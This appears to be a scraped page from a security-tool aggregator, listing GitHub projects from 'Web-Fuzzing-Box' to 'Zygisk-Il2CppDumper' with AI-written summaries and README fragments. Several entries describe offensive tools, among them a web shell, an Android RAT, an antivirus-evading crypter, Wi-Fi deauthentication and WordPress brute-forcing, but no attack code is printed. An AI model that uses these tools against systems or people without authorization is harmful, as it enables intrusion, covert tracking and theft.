Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: 🕵️‍♂️ All-in-one OSINT tool for analysing any website

🕵️‍♂️ All-in-one OSINT tool for analysing any website

Web-Fuzzing-Box

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Web-Fuzzing-Box is a tool designed for web application security testing, offering a diverse collection of dictionaries and payloads for conducting fuzzing attacks, including brute force, directory and file enumeration, and exploitation of web vulnerabilities. Notable features include a comprehensive suite of dictionaries tailored for specific vulnerabilities such as SQL injection, XSS, and authentication bypass, as well as case studies demonstrating the practical application of these resources in real-world scenarios. This tool is particularly valuable for penetration testers and security researchers seeking to enhance their web application assessments.

webanalyze

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Webanalyze is a performance-oriented tool written in Go that identifies technologies used by web applications by analyzing HTTP responses from specified hosts. Its primary use case is for security assessments and technology profiling, supporting bulk analysis of multiple hosts via input files and offering output in various formats such as CSV and JSON. Notable features include the ability to crawl links from a root page, search for subdomains, and download updated app definitions from the Wappalyzer repository.

webcopilot

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WebCopilot is an automation tool for security assessments that enumerates subdomains of a target domain and scans for vulnerabilities such as XSS, SQLi, and RCE. It employs various open-source tools for subdomain enumeration, active scanning, endpoint crawling, and filtering of vulnerability parameters, ultimately presenting the results in a structured manner. Notable features include comprehensive subdomain enumeration, endpoint crawling, and integration with multiple vulnerability scanning tools.

README

WebCopilot

An automation tool that enumerate subdomains then filters out xss, sqli, open redirect, lfi, ssrf and rce parameters and then scans for vulnerabilities.

webcrack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: webcrack is a reverse engineering tool designed for JavaScript that deobfuscates code produced by obfuscator.io, unminifies, and unpacks files from webpack and browserify, aiming to restore the original source code structure. Notable features include performance optimizations, auto-detection of code patterns, and the removal of obfuscator artifacts, all implemented in TypeScript with a robust testing suite. The tool is accessible via a command line interface and offers an API for integration into other applications.

webkiller

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WebKiller V2 is a Python-based tool designed for information gathering and CMS detection in web applications. Its primary use case is to aid cybersecurity professionals in identifying vulnerabilities and obtaining crucial data about target websites. Notable features include a user-friendly command-line interface, compatibility with multiple operating systems, and comprehensive installation instructions.

README

WebKiller V2

Tool Information Gathering Write With Python.

PreView

██╗ ██╗███████╗██████╗ ██╗ ██╗██╗██╗ ██╗ ███████╗██████╗ ██║ ██║██╔════╝██╔══██╗██║ ██╔╝██║██║ ██║ ██╔════╝██╔══██╗ ██║ █╗ ██║█████╗ ██████╔╝█████╔╝ ██║██║ ██║ █████╗ ██████╔╝ ██║███╗██║██╔══╝ ██╔══██╗██╔═██╗ ██║██║ ██║ ██╔══╝ ██╔══██╗ ╚███╔███╔╝███████╗██████╔╝██║ ██╗██║███████╗███████╗███████╗██║ ██║ ╚══╝╚══╝ ╚══════╝╚═════╝ ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ ==================================================================== ** WebSite : UltraSec.org ** ** Channel : @UltraSecurity ** ** Developers : Ultra Security Team ** ** Thank's : .::Shayan::. ** ==================================================================== [$] Choose one of the options below [1] Information Gathering [2] CMS Detection [3] Developer :) [4] Exit . . . ┌─[WEBKILLER~@HOME] └──╼ $

Operating Systems Tested

Kali Linux 2020.1

Windows 10

Ubuntu 19.10

Install

git clone https://github.com/ultrasecurity/webkiller.git cd webkiller pip3 install -r requirements.txt python3 webkiller.py
ScreenShot

WebPlotDigitizer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WebPlotDigitizer is a computer vision-assisted tool designed to extract numerical data from images of data visualizations, facilitating data retrieval for researchers and professionals across various fields. Its primary use case is converting graphical data representations, such as plots and charts, into usable datasets. Notable features include a user-friendly interface and cloud-based AI support for enhanced data extraction capabilities.

README

WebPlotDigitizer

A large quantity of useful data is locked away in images of data visualizations. WebPlotDigitizer is a computer vision assisted software that helps extract numerical data from images of a variety of data visualizations.

WechatMagician

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WechatMagician is an Xposed plugin that empowers users to control chat messages and Moments in WeChat, supporting versions 6.5.3 and above. Its notable features include preventing message recalls, allowing multiple image sends, and blocking advertisements in Moments, while maintaining a modular design for stability and ease of use. The tool also offers privacy-focused functionalities, such as marking chats as read in bulk and hiding chat traces with designated friends.

weird_proxies

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Weird Proxies is a comprehensive cheat sheet designed to document the behaviors and vulnerabilities of various reverse proxies, cache proxies, and load balancers. The tool serves as a resource for security professionals analyzing potential security threats and related attack vectors associated with commonly used proxy technologies like Nginx, Apache, and AWS. Notable features include detailed analyses and links to additional research articles, offering practical insights for understanding weaknesses in proxy configurations.

weirdAAL

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WeirdAAL (AWS Attack Library) is a tool designed for simulating and performing various attack scenarios specifically targeting Amazon Web Services environments. Its primary use case is to aid security professionals in understanding and mitigating potential vulnerabilities within AWS by utilizing a comprehensive collection of attack vectors. Notable features include extensive documentation and potential integration with other security testing frameworks.

README

WeirdAAL (AWS Attack Library)

WeirdAAL (AWS Attack Library)

wesng

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Windows Exploit Suggester - Next Generation (WES-NG) is a vulnerability assessment tool for Windows operating systems from XP to 11, leveraging the output of the systeminfo utility to identify potential vulnerabilities and applicable exploits. The tool supports multiple methods for patch assessment and incorporates a database updated from various security sources, including the Microsoft Security Update API. Notable features include the ability to validate missing patches against Microsoft’s Update Catalog and a collector for maintaining an up-to-date vulnerability database.

Whaler

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Whaler is a Go-based tool that facilitates the reverse engineering of Docker images by reconstructing the Dockerfile that generated them. Its primary use case involves extracting valuable information from Docker images, such as identifying added files, detecting potential secret files, and displaying metadata including open ports and environment variables. Notable features include the ability to automatically pull Docker images, filter out irrelevant filenames, and save image layers for further analysis.

WhatBreach

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WhatBreach is an OSINT tool designed to identify and aggregate data on email breaches from various sources, enabling users to assess the security status of one or multiple email addresses. Key features include integration with APIs like haveibeenpwned.com for breach detection, dehashed.com for database searches, and additional functionality for domain investigation and pastes analysis from platforms such as Pastebin. The tool also supports request throttling to prevent service blocking, customizable output directories for data downloads, and verification of email deliverability.

whatsapp-osint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WhatsApp Beacon is an OSINT tracking tool designed to monitor the online status of specific WhatsApp contacts, storing session data in SQLite for analysis. It features automated installation, headless operation, and advanced analytics capabilities, including exporting data to Excel and generating detailed HTML reports with visualizations. This tool emphasizes ethical use for educational and research purposes.

README

🕵️‍♂️ WhatsApp Beacon (OSINT Tracker)

WhatsApp Beacon tracks when specific WhatsApp contacts go online and stores every completed session in SQLite. It can export to Excel, generate a polished analytics dashboard, and run fully headless once the session is authenticated.

WhatsMyName

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WhatsMyName is an open-source tool designed for OSINT practitioners to identify whether specific usernames are registered on various websites, using a central JSON data file of accessible sites that adhere to specific URL format criteria. The project has shifted its focus from direct username checking scripts to maintaining and enhancing its dataset, which supports various third-party tools and extensions for username validation across diverse platforms. Notable features include community-driven contributions, compatibility with multiple user-checking tools, and the ability to integrate with user-friendly web interfaces and applications.

wholeaked

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: wholeaked is a Go-based file-sharing tool designed to identify the responsible individual in the event of a document leakage. It accomplishes this by creating a unique hidden signature for each recipient, which is embedded in the shared file, and offers integrations with services such as Sendgrid and AWS SES for automated file distribution. Key features include compatibility with various file types and enhanced functionality for common formats like PDF and DOCX, enabling both automated and manual sharing.

wifi-deauth

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Wifi-deauth is a cybersecurity tool designed to perform denial-of-service (DoS) attacks by disconnecting all devices from a targeted Wi-Fi network without requiring the network’s password. It operates by sending spoofed deauthentication packets to both the access point and its connected clients, with the capability to operate across multiple channels simultaneously, supporting both 2.4GHz and 5GHz bands. Notable features include the ability to filter attacks by specific SSIDs or BSSIDs, optional usage of multiple interfaces, and tailored channel scanning to enhance attack efficacy.

Wifi-Hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Wifi-Hacking is a cybersecurity tool designed to penetrate and retrieve Wi-Fi passwords using various methods, including scanning networks, capturing handshakes, and employing WPS attacks. Its notable features include the ability to start and stop monitor mode, create custom wordlists for cracking, and support for multiple Linux-based operating systems, making it versatile for penetration testing and educational purposes. Users are cautioned to utilize this tool responsibly and ethically.

README

windows-kernel-exploits

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The windows-kernel-exploits repository provides a collection of exploit code snippets for various vulnerabilities in the Windows kernel, leveraging known CVEs to demonstrate potential elevation of privilege and remote code execution attacks. This tool primarily serves security researchers and penetration testers conducting vulnerability assessments on Windows operating systems. Notable features include comprehensive listings of CVEs, along with links to proof-of-concept exploits and detailed descriptions for a wide range of Windows versions.

Windows-Local-Privilege-Escalation-Cookbook

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Windows Local Privilege Escalation Cookbook is designed to educate users on local privilege escalation techniques within Windows environments, focusing on exploiting misconfiguration vulnerabilities. It provides structured guidance, including sections on description, lab setup, enumeration, exploitation, and mitigation for various vulnerabilities, while also emphasizing ethical usage and the need for responsible application of the techniques outlined. Notably, it excludes evasion tactics and includes a PowerShell script for disabling Windows Defender under specific conditions.

WinPwn

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WinPwn is a comprehensive PowerShell-based tool designed for internal penetration testing, emphasizing automation and proxy support for reconnaissance and exploitation tasks. Its notable features include modules for session management, credential dumping, local and domain reconnaissance, and privilege escalation checks, alongside the ability to operate offline and integrate well-known offensive security scripts. The tool streamlines the penetration testing process with an interactive menu for selecting various attack methods and extensive built-in reconnaissance capabilities.

wireless-carplay-dongle-reverse-engineering

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Wireless Carplay Dongle Reverse Engineering tool provides a framework for gaining root access and modifying firmware on various Carlinkit wireless Carplay dongles, primarily aimed at enthusiasts looking to customize their devices. Key features include the ability to switch between firmware versions using both software and hardware methods, alongside insights into hardware components and their specifications. Additionally, the repository documents the challenges faced due to recent updates from Carlinkit that have hardened the firmware against reverse engineering.

WitnessMe

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WitnessMe is a versatile web inventory tool designed for efficient scanning and data gathering, primarily utilizing headless Chromium via the Pyppeteer library. It excels in processing large Nessus and NMap XML files, generates CSV and HTML reports, and features a RESTful API for remote scanning and extensibility to accommodate custom functionalities. With additional capabilities like HTTP proxy support, signature scanning through YAML files, and terminal screenshot previews, WitnessMe stands out for providing a comprehensive workflow without significant installation challenges.

wordlists

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Trickest Wordlists repository provides a collection of real-world information security wordlists, updated regularly for various technologies including popular CMS platforms and cloud assets. Its primary use case is to assist security professionals in penetration testing and vulnerability assessments by generating wordlists for directory bruteforcing and subdomain enumeration. Notable features include distinct wordlist formats for different scenarios, such as base and all levels for technology-based lists, as well as comprehensive data extracted from top websites’ robots.txt files and extensive subdomain inventories from public bug bounty programs.

worldmonitor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: World Monitor is an AI-driven real-time global intelligence dashboard that aggregates news, monitors geopolitical events, and tracks infrastructure within a comprehensive situational awareness interface. It features over 435 curated news feeds, dual map visualization capabilities with multiple data layers, and advanced cross-stream correlation for military, economic, and disaster signals, making it ideal for analysts seeking in-depth insights into global developments. Additional functionalities include a Country Intelligence Index and finance monitoring tools covering various asset classes.

WPeChatGPT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WPeChatGPT is an IDA plugin that leverages OpenAI’s gpt-3.5-turbo model to assist analysts in evaluating binary files. Its primary use case includes analyzing binary functions for their intended purpose, renaming variables, restoring functions using Python, identifying vulnerabilities, and automatically generating exploits for those vulnerabilities. Notable features include support for automatic analysis of binary files through Auto-WPeGPT and the ability to work seamlessly within the IDA environment using various shortcuts and menu options.

WPForce

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WPForce is a comprehensive suite of tools designed for attacking WordPress installations, primarily focusing on brute-forcing login credentials via the API. Its notable features include the ability to automatically upload interactive shells post-authentication, dump WordPress password hashes, and pivot to a meterpreter session, making it suitable for penetration testing and post-exploitation scenarios. The tool leverages multi-threading to optimize the brute-force attack process while providing options for verbose output and error debugging.

wpprobe

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WPProbe is a rapid scanning tool designed to detect installed WordPress plugins and themes through REST API enumeration and HTML discovery, mapping them to known vulnerabilities. It supports multiple scanning modes, including stealthy, brute-force, and hybrid methods, allowing detection of over 5,000 plugins without brute-force and many more with it. The tool fetches an updated vulnerability database automatically, eliminating the need for an API key by default, while still allowing for custom configurations and output formats.

wpscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WPScan is a specialized security scanner for WordPress sites, primarily used to identify vulnerabilities in themes and plugins as well as misconfigurations. Its notable features include support for user enumeration, integration with the WordPress Vulnerability Database for real-time risk assessment, and customizable scanning options for stealth or aggressive detection modes. The tool can be easily installed via RubyGems or Docker and offers extensive usage documentation for diverse scanning approaches.

wwwolf-php-webshell

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: WhiteWinterWolf’s PHP web shell is a lightweight tool designed for reliable remote server access, focusing on compatibility with both UNIX-like and Windows systems without requiring modifications. It addresses common limitations in existing web shells, such as incorrect assumptions about URLs, and supports clean PHP output execution while providing features like password protection, working directory setting, and dual file upload methods. The tool adheres to the KISS principle, making it straightforward to integrate with various exploitation techniques.

X-osint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: X-osint is an open-source OSINT tool designed for gathering credible information related to phone numbers, email addresses, and IP addresses, with additional features planned for future updates. Notably, it includes functionalities for IP and email information gathering, metadata extraction from images and files, subdomain enumeration, and DNS lookups, among others. The tool is built using Python and Bash and is maintained actively, ensuring regular updates and enhancements.

README

X-osint

This is an osint tool which gathers useful and yet credible valid information about a phone number, user’s email address and ip address and more to come in future updates

xAnalyzer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: xAnalyzer is a plugin for the x64dbg debugger designed to enhance static code analysis of debugged applications. It leverages extensive API function call detection and provides detailed function definitions, argument types, and additional debugging information, greatly improving the user’s comprehension before commencing debugging tasks. Notable features include automatic loop detection, user-maintained definition files, and support for over 13,000 API definitions from approximately 200 DLLs.

README

XAttacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XAttacker is a comprehensive exploitation tool designed for scanning and auto-exploiting vulnerabilities in web applications, particularly those using popular Content Management Systems (CMS). It identifies the target website’s architecture, detects vulnerabilities, generates exploits, and provides the user with the relevant exploit link. Notable features include a vulnerability scanner, auto-exploiting capabilities, and support for multiple CMS platforms, along with dork search functionality across various search engines.

README

XAttacker V2.5 Tool FREE

XATTACKER A Massive Exploiting Tool capable of scanning and auto-exploiting vulnerabilities in web applications, By providing a target website to the tool, it auto detects its’ architecture if using a Content Management Service (CMS) and tries to find vulnerabilities based on the detected CMS, After finding the vulnerabilities the tool will generate an exploit for the website and send the user the link of the exploit.

XELFViewer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XELFViewer is a cross-platform ELF file viewer and editor designed for Windows, Linux, and MacOS environments. Its primary use case includes analyzing and modifying ELF (Executable and Linkable Format) files, which are commonly used in Unix-based operating systems. Notable features include a user-friendly interface for navigation, functionality for both viewing and editing file contents, and support for community translations.

README

ELF file viewer/editor for Windows, Linux and MacOS.

xencrypt

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Xencrypt is a PowerShell-based crypter designed to compress and encrypt PowerShell scripts while bypassing AMSI and modern antivirus solutions. Its notable features include variable name randomization, support for recursive layering of encrypted scripts, and a minimal overhead due to compression. This open-source tool serves as a demonstration for users looking to develop their own crypters, offering flexibility for customization and ease of use.

README

Xencrypt

PowerShell crypter v 1.0

Authors

Xentropy ( @SamuelAnttila )
SecForce ( @SECFORCE_LTD )

xeuledoc

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: xeuledoc is a Python tool designed for retrieving metadata and information from various types of public Google documents, including Google Drive files, Google Docs, Sheets, Slides, Drawings, My Maps, Apps Script, and Jamboard. Notable features include ease of installation via PyPI and GitHub, and the ability to handle multiple Google document formats, making it a versatile solution for information extraction from Google’s platform.

README

xeuledoc

xhunter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XHUNTER is an advanced Android Remote Access Tool (RAT) designed for penetration testing and ethical hacking purposes. It simplifies the connection process between the attacker and victim by eliminating the need for complex port forwarding, offering a user-friendly interface for controlling a victim’s Android device. Notable features include the capability to build and bind payloads to legitimate applications and an intuitive setup process for immediate usability.

README

XMachOViewer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XMachOViewer is a cross-platform Mach-O file analysis tool designed for Windows, Linux, and macOS. Its primary use case involves examining Mach-O binaries through features such as heuristic scanning, string and hex viewing, disassembly, entropy analysis, and dynamic library linking, enabling users to uncover characteristics, anomalies, and cryptographic signatures within the files. Notable features include support for multiple architectures, automatic file format detection, and a detailed symbol table viewer.

xmir-patcher

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XMiR-Patcher is a firmware patching tool specifically designed for Xiaomi routers, facilitating the modification of router firmware for enhanced functionality. It supports both Windows and Linux/Mac operating systems, requiring Python 3.8+ and OpenSSL for operation. Notable features include straightforward execution through batch and shell scripts, making it accessible for users across different platforms.

README

XMiR-Patcher

Firmware patcher for Xiaomi routers

Usage

Windows

Run run.bat

Linux / Mac OS

Install python 3.8+ and openssl

Run run.sh

Donations

xoreos

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: xoreos is an open-source reimplementation of BioWare’s Aurora engine, targeting classic games like Neverwinter Nights and Dragon Age II to provide portable access across platforms. The tool currently supports basic graphics rendering and sound playback, with partial in-game graphics and a starting point for a scripting system, though no full gameplay mechanics are implemented yet. Its modular design allows for contributions from the community, fostering ongoing development and enhancement of supported titles.

XPEViewer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XPEViewer is a cross-platform PE file viewer and editor designed for Windows, Linux, and macOS environments. Its primary use case is to facilitate the analysis and modification of Portable Executable (PE) files, making it a valuable tool for reverse engineers and software developers. Notable features include functionality for viewing various PE file sections, editing capabilities, and support for community contributions through translation.

README

xsser

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XSSer is an automated framework designed for the detection, exploitation, and reporting of Cross-Site Scripting (XSS) vulnerabilities in web applications. It features over 1300 pre-installed XSS attack vectors, sophisticated techniques for bypassing various web application firewalls (WAFs) and browsers, and is capable of operating on multiple platforms with dependencies on Python and essential libraries such as Selenium and BeautifulSoup.

README

Web: https://xsser.03c8.net

Cross Site “Scripter” (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

xssor2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: XSS’OR is a versatile tool designed for exploiting cross-site scripting (XSS) vulnerabilities through JavaScript-based payloads. Its primary use case involves encoding, decoding, and probing potential attack vectors, making it applicable for security testing and penetration testing scenarios. Notable features include a web interface for payload manipulation, compatibility with both Python 2 and 3, and robust support for Docker deployment.

README

XSS’OR

XSS’OR - Hack with JavaScript.

ONLINE

You can have a try:

Xteam

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Xteam is a multifunctional tool designed for information gathering and security testing, primarily targeting Instagram data extraction, Android lockscreen cracking, and phishing methods. It includes features for wireless attacks and provides an update script to enhance its capabilities. The tool operates on Termux and Kali Linux, requiring no root access for installation.

README

Xteam tool

## Screenshot:

Features:

Insta information gathering

Crack android lockscreen interfaces

Phishing Hacks

Wireless attacks added

Update script

Remove script

more coming…

Requirements

Data connection

yakit

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Yakit is an interactive application security testing platform that integrates the CyberSecurity Domain Specific Language (CDSL) for enhanced security operations. Its primary use case is to provide a comprehensive GUI for manipulating security testing capacities via a gRPC server, fully replacing tools like BurpSuite and offering unique features such as a visual web fuzzing tool and a plugin store for customizable security scripts. Additionally, Yakit allows non-coders to harness advanced security capabilities without programming knowledge, facilitating both local and remote deployment.

yarGen

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: yarGen is a YARA rule generator designed to create rules based on strings extracted from malware files while filtering out strings common to goodware, thereby enhancing detection capabilities. Notable features include the integration of a naive-Bayes classifier for improved string selection, opcode processing from PE files, and support for additional conditions using the pe module. The tool also allows for output tailored for AI processing by appending instructions to generated rules when using the --ai flag.

yark

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Yark is a YouTube archiving tool designed to simplify the process of downloading and managing video content and metadata from YouTube channels. Its primary use case is to create and maintain local archives of videos, allowing users to refresh and view their collections offline, complete with timeline reports and commenting features. Notable features include an easy-to-use command line interface, support for rich history and stats visualization, and a robust directory-based archive structure that preserves deleted or private videos.

yesitsme

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Yes, it’s me! is a Python-based Open Source Intelligence (OSINT) tool designed to locate Instagram profiles via name, email, or phone number. It effectively utilizes indexing from dumpor.com to fetch usernames associated with a specified name and compares them against provided obfuscated contact details, enabling streamlined online investigations. Notable features include multi-level match scoring, customizable request timeouts, and support for partial inputs to enhance user anonymity.

README

ysoserial

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ysoserial is a proof-of-concept tool designed to generate payloads for exploiting vulnerabilities related to unsafe Java object deserialization. It includes a collection of property-oriented programming “gadget chains” for various Java libraries, allowing users to execute arbitrary commands on an application host when deserialization occurs under vulnerable conditions. Notable features include support for multiple payload types and compatibility with various Java libraries, making it a versatile tool for security researchers focusing on Java application vulnerabilities.

Zehef

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Zehef is an OSINT tool designed to gather public information on targeted email addresses. Its primary use case includes checking if an email is associated with any data breaches, pastes on platforms like Pastebin, and identifying linked social media accounts across various services. Notable features include email combination generation and integration with breach detection services like HudsonRock.

README

Z e h e f

Zehef is an osint tool who studies the emails 📩

😇 Abouts zehef

Zehef v2 is a tool focused on finding public information on a targeted email.

Zero-attacker

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Zero Attacker is a suite of ethical hacking tools designed for penetration testing and includes both free and paid advanced tools. It offers a user-friendly interface for quick setup and execution via Python, with additional features available upon request through their Discord server. The tool emphasizes community engagement and support, aiming to facilitate a comprehensive hacking experience for users.

README

Zero Attacker

launching new version beta testing is here add me on discord .asjad asap

ZeusCloud

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ZeusCloud is an open-source cloud security platform designed to discover, prioritize, and remediate security risks across AWS environments. Its notable features include asset inventory creation, attack path discovery, graphical visualization of risks, customizable security controls, and comprehensive remediation guides, all aligned with compliance standards such as PCI DSS and CIS benchmarks. This tool addresses the complexities and challenges of securing expanding cloud workloads with user-friendly and actionable insights.

zizmor

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: zizmor is a static analysis tool designed specifically for GitHub Actions, aimed at identifying common security vulnerabilities within CI/CD workflows. It detects issues such as template injection vulnerabilities, accidental credential leakage, excessive permission grants, and misleading git references, among others. The tool’s primary use case is to enhance the security posture of automated workflows by providing insights and recommendations for remediation.

README

🌈 zizmor

zizmor is a static analysis tool for GitHub Actions.

Zygisk-Il2CppDumper

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Zygisk-Il2CppDumper is a tool designed for dumping IL2CPP data at runtime while leveraging Zygisk to effectively bypass various protections, encryptions, and obfuscations. Its primary use case is for developers and security researchers needing to extract and analyze IL2CPP binaries from Android applications. Notable features include its compatibility with Magisk, flexible installation methods, and the ability to automate the dumping process through GitHub Actions or Android Studio.

README

Zygisk-Il2CppDumper

Il2CppDumper with Zygisk, dump il2cpp data at runtime, can bypass protection, encryption and obfuscation.

About

Mon, 01 Jan 0001 00:00:00 +0000

About HackyFeed

HackyFeed is a community-driven cybersecurity tools aggregator, inspired by KitPloit which went offline in 2025.

The goal is simple: make it easy to discover new and useful cybersecurity tools from GitHub.

How It Works

A Go CLI tool queries the GitHub API daily for repositories tagged with security-related topics (pentesting, exploit, red-team, OSINT, etc.)

New discoveries are stored in a local SQLite database

An AI pipeline (via LiteLLM) reads each tool’s README and generates a concise summary

Hugo renders the summaries into this static site

GitHub Actions deploys it automatically

Sources

GitHub Topics: pentesting, exploit, red-team, offensive-security, OSINT, vulnerability-scanner, bug-bounty, and more

awesome-rainmana: A curated list of starred GitHub repositories

Open Source

HackyFeed is fully open source under the MIT License. The entire pipeline — from data collection to site generation — is available at github.com/rainmana/hackyfeed.

Disclaimer

Mon, 01 Jan 0001 00:00:00 +0000

Legal Disclaimer

HackyFeed is an automated aggregator of publicly available cybersecurity tools hosted on GitHub. By using this site, you acknowledge and agree to the following:

No Endorsement

HackyFeed does not endorse, recommend, or vouch for any of the tools listed on this site. Inclusion of a tool does not imply approval of its functionality, safety, or legality. Tools are listed solely because they are publicly available on GitHub and tagged with relevant cybersecurity topics.

HackyFeed

.github

README

Pretendo Network

Contents

.NET-Deobfuscator

.NET-Obfuscator

README

.NET-Obfuscator

31-days-of-API-Security-Tips

A-Red-Teamer-diaries

AboutSecurity

README

AboutSecurity

参考

Above

Active-Directory-Exploitation-Cheat-Sheet

Active-Directory-Exploitation-Cheat-Sheet

ADB-Toolkit

adbwebkit

AdminHack

README

afrog

README

A Security Tool for Bug Bounty, Pentest and Red Teaming

agentic-radar

README

AggressorScripts

ai-website-cloner-template

aleph

ALHacking

README

Version 4

AllHackingTools

README

AlliN

alternative-frontends

README

Alternative Frontends

ambiguous-png-packer

README

Ambiguous PNG Packer

Android-Exploits

Android-PIN-Bruteforce

Android-Security-Exploits-YouTube-Curriculum

android-unpacker

README

android-unpacker

android-unpinner

Androl4b

Andromeda

README

AndroRAT

AndroRAT

README

AndroRAT

AngryOxide

Anthropic-Cybersecurity-Skills

anti-emulator

README

anti-emulator

AntiCheat-Testing-Framework

README

AntiCheat-Testing-Framework

AntiDBG

antivmdetection

API-SecurityEmpire

README

🛡️ API Security Empire

🚪 First gate: {{Recon}}

APISecurityBestPractices

README

GitGuardian Documentation and Resources

apk.sh

APKHunt

APKiD

README

APKiD

apkleaks

README

🚪 First gate: `{{Recon}}`

Dive into a new Pentesting Experience with
Athena OS